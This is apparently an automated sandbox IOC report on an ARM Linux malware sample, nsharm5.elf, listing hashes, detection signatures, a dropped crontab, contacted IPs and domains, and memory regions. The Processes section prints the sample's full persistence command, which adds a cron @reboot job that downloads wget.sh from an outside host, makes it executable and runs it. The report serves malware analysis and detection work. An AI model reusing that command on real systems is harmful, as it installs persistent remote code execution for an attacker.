Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

nsharm5.elf

ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy:	6.067024738015449
Filename:	nsharm5.elf
Filesize:	75108
MD5:	ec377a1b6a816a87c4874e7b04e53ab4
SHA1:	e8e06aaacde689c4a8703aa7ff62d7442d541aca
SHA256:	f8c9ae564656a7a30d4dcb95719e593e081a82a472a220e95c99096f35398795
SHA512:	1072be20d27f5346195d5608b835b87b52c86a7e121a64dde1065a24afba8486673401f74a435e0d872ef54785a3c566e7a8419b9504a5380afb97c1ac3fadc6
SSDEEP:	1536:/pBn6Hm2LCVs9M0mpmm29NPwwxO8hv2P:/pB6DL997Umm21x/+
Preview:	.ELF...a..........(.........4....#......4. ...(.......................................... ... ... .......T..........Q.td..................................-...L."...`@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/var/spool/cron/crontabs/tmp.ueTw0E

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.ueTw0E
Category:	dropped
Dump:	tmp.ueTw0E.18.dr
ID:	dr_0
Target ID:	18
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.145441750364602
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQ3ZZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig83feHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/tmp/nsharm5.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/nsharm5.elf

There are 1 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	18
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.ueTw0E.18.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.24

kingstonwikkerink.dyn

185.82.200.181

IPs

Domain

Country

Malicious

91.149.218.232

unknown

Poland

Details

IP:	91.149.218.232
TargetID:	-1
Country:	Poland
Countrycode:	POL
ASN number:	198401
ASN name:	GECKONET-ASPL
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

31.13.248.89

unknown

Bulgaria

Details

IP:	31.13.248.89
TargetID:	-1
Country:	Bulgaria
Countrycode:	BGR
ASN number:	34224
ASN name:	NETERRA-ASBG
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

213.182.204.57

unknown

Latvia

Details

IP:	213.182.204.57
TargetID:	-1
Country:	Latvia
Countrycode:	LVA
ASN number:	9009
ASN name:	M247GB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

Memdumps

Base Address

Regiontype

Protect

Malicious

7fdf6df5a000

page read and write

7ffd189ee000

page read and write

560b71a40000

page read and write

7fde68029000

page execute read

560b73a55000

page read and write

560b717e6000

page execute read

7ffd189fc000

page execute read

7fdf6d280000

page read and write

7fdf6df7e000

page read and write

7fdf68021000

page read and write

7fde68038000

page read and write

7fdf6d280000

page read and write

7fdf6d280000

page read and write

7ffd189ee000

page read and write

7fdf6d8df000

page read and write

7fdf6de31000

page read and write

7fdf6d674000

page read and write

7ffd189fc000

page execute read

7fdf6dc50000

page read and write

560b71a37000

page read and write

7fdf6df7e000

page read and write

560b71a37000

page read and write

560b717e6000

page execute read

7fdf6df5a000

page read and write

7fdf6de31000

page read and write

560b75b0e000

page read and write

560b73a55000

page read and write

7fdf6df5a000

page read and write

7fdf6d902000

page read and write

7fde68032000

page read and write

7fdf6d8df000

page read and write

7fdf6ca78000

page read and write

7fdf6da6e000

page read and write

7fdf68021000

page read and write

560b717e6000

page execute read

560b71a37000

page read and write

7fdf6ca78000

page read and write

7fdf6dc50000

page read and write

7ffd189ee000

page read and write

7fdf6d312000

page read and write

7fde68038000

page read and write

560b73a3e000

page execute and read and write

560b71a40000

page read and write

7fdf68021000

page read and write

7fdf6df7e000

page read and write

7fdf6dc50000

page read and write

560b73a3e000

page execute and read and write

7fdf6da6e000

page read and write

560b73a3e000

page execute and read and write

7fdf6dfc3000

page read and write

7fdf6d8df000

page read and write

7fde68038000

page read and write

7fdf6ca78000

page read and write

7fdf6d902000

page read and write

7fde68032000

page read and write

7fdf67fff000

page read and write

7fdf6d312000

page read and write

7fdf6d674000

page read and write

7fdf67fff000

page read and write

560b75b0e000

page read and write

7fdf67fff000

page read and write

7fde68029000

page execute read

7fdf6d674000

page read and write

7ffd189fc000

page execute read

7fdf6d312000

page read and write

7fdf6d902000

page read and write

7fdf6dfc3000

page read and write

560b73a55000

page read and write

7fde68032000

page read and write

7fdf6dfc3000

page read and write

560b71a40000

page read and write

7fdf6de31000

page read and write

7fdf6da6e000

page read and write

560b75b0e000

page read and write

7fde68029000

page execute read

There are 65 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
nsharm5.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnsharm5.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
nsharm5.elf